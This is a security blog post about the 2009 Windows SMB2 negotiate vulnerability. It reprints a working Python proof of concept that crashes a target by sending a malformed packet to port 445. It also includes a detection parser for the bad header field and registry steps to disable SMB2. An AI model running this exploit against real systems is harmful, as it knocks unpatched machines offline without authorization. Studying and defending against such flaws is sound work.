Security Information and Review

Collection of security information and review

The Latest Microsoft Windows SMB Vulnerability

Author : Admin

This week, the latest Microsoft Windows vulnerability was reported on several sites and blogs, such as the securityfocus site, the g-laurent blog and others. Newer Microsoft Windows operating systems come with a new SMB protocol version, known as SMB2. The vulnerability is in the Microsoft Server Message Block (SMB) implementation, specifically in the handling of the SMB2 negotiate protocol request.

The SMB2 (Server Message Block v2) protocol was introduced in Microsoft Windows Vista and is present in newer Microsoft Windows operating systems. SMB2 significantly improves performance and reduces the number of commands and subcommands. SMB1 was originally designed by IBM and shipped on a wide variety of operating systems. The intellectual property of SMB2 is clearly owned by Microsoft.

The flaw is an array index error in the SMB2 protocol implementation in the SRV2.sys kernel driver. SRV2.sys fails to handle malformed SMB headers in the negotiate protocol request functionality. The negotiate protocol request is the first SMB query a client sends to an SMB server to identify the SMB dialect. For details about SMB2 and its components, see the Microsoft site.

It is a serious vulnerability: a remote attacker could exploit it to execute code with system-level privileges. The vulnerability allows remote attackers to cause a denial of service (system crash) via an & (ampersand) character in the Process ID High header field of a negotiate protocol request packet. This triggers an attempted dereference of an out-of-bounds memory location. The vulnerability can be exploited if file and printer sharing is enabled (the SMB protocol is used by the file and printer sharing service).

Many exploits are publicly available; the following proof of concept was released by Laurent Gaffié at g-laurent.blogspot.com.

 
#!/usr/bin/python
#When SMB2.0 receives a "&" char in the "Process Id High" SMB header field
#it dies with a PAGE_FAULT_IN_NONPAGED_AREA error
 
from socket import socket
from time import sleep
 
host = "IP_ADDR", 445
buff = (
"\x00\x00\x00\x90" # Begin SMB header: Session message
"\xff\x53\x4d\x42" # Server Component: SMB
"\x72\x00\x00\x00" # Negotiate Protocol
"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
"\x00\x26" # Process ID High: --> :) normal value should be "\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00" 
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57" 
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61" 
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c" 
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c" 
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e" 
"\x30\x30\x32\x00"
)
s = socket()
s.connect(host)
s.send(buff)
s.close()
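
A detection-side view of the malformed header described above, as an added example that is not part of the original post or the published proof of concept: it parses an SMB1 negotiate request and flags a non-zero Process ID High field, which the proof of concept's own comment says should normally be 00 00. The function names and the constructed sample frames are assumptions made for illustration, and treating any non-zero value as suspicious is a heuristic.

```python
import struct

SMB1_MAGIC = b"\xffSMB"
SMB_COM_NEGOTIATE = 0x72
# 32-byte SMB1 header (little-endian): protocol, command, status, flags,
# flags2, PID high, security features, reserved, TID, PID low, UID, MID.
SMB1_HEADER = struct.Struct("<4sBIBHH8sHHHHH")

def parse_dialects(body):
    """Names from the negotiate body: WordCount, ByteCount, dialect list."""
    if len(body) < 3:
        return []
    byte_count = struct.unpack_from("<H", body, 1)[0]
    data = body[3:3 + byte_count]
    # Each entry is 0x02 followed by a NUL-terminated ASCII name.
    return [d[1:].decode("ascii", "replace")
            for d in data.split(b"\x00") if d.startswith(b"\x02")]

def inspect_negotiate(frame):
    """Return a finding for an SMB1 negotiate request, or None otherwise."""
    if len(frame) < 4 + SMB1_HEADER.size or frame[0] != 0x00:
        return None  # truncated, or not a session message
    smb = frame[4:4 + int.from_bytes(frame[1:4], "big")]
    if len(smb) < SMB1_HEADER.size:
        return None
    magic, cmd, _, _, _, pid_high = SMB1_HEADER.unpack_from(smb)[:6]
    if magic != SMB1_MAGIC or cmd != SMB_COM_NEGOTIATE:
        return None
    dialects = parse_dialects(smb[SMB1_HEADER.size:])
    return {"pid_high": pid_high,
            "offers_smb2": any(d.startswith("SMB 2") for d in dialects),
            "suspicious": pid_high != 0}  # page: normal value is 00 00

def build_sample(pid_high, dialects=("NT LM 0.12", "SMB 2.002")):
    """Constructed frame for offline testing; it is parsed, never sent."""
    data = b"".join(b"\x02" + d.encode("ascii") + b"\x00" for d in dialects)
    hdr = SMB1_HEADER.pack(SMB1_MAGIC, SMB_COM_NEGOTIATE, 0, 0x18, 0xC853,
                           pid_high, b"\x00" * 8, 0, 0xFFFF, 0xFEFF, 0, 0)
    smb = hdr + b"\x00" + struct.pack("<H", len(data)) + data
    return b"\x00" + len(smb).to_bytes(3, "big") + smb

if __name__ == "__main__":
    for label, pid_high in (("normal", 0x0000), ("malformed", 0x2600)):
        print(label, inspect_negotiate(build_sample(pid_high)))
```

The same field check can be applied to frames taken from a packet capture of TCP port 445, provided each frame starts at the 4-byte session header.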

No patch is available at this moment, so how do we fix this problem? One way to mitigate the vulnerability until a patch is available from Microsoft or the community is to close the SMB protocol and ports 139 / 445 on our operating system and configure our firewall properly.

Step by step to disable SMB2 on our operating system:

  1. Click Start – Run, type regedit in the edit box and then click OK.
  2. Find the following key: HKLM\System\CurrentControlSet\Services.
  3. Click LanManServer.
  4. Click Parameters.
  5. Right-click to add a new DWORD (32-bit) value.
  6. Type smb2 in the name field and set the value data field to 0.
  7. Exit.

To apply the change, open a command prompt with administrator privileges and type “net stop server” and then “net start server”. For more detail about this advisory, see Microsoft Security Advisory 975497.

Categories: Windows Security
Hi. I am a long time reader. I wanted to say that I like your blog and the layout. Peter Quinn
15 September 09 at 10:59
 
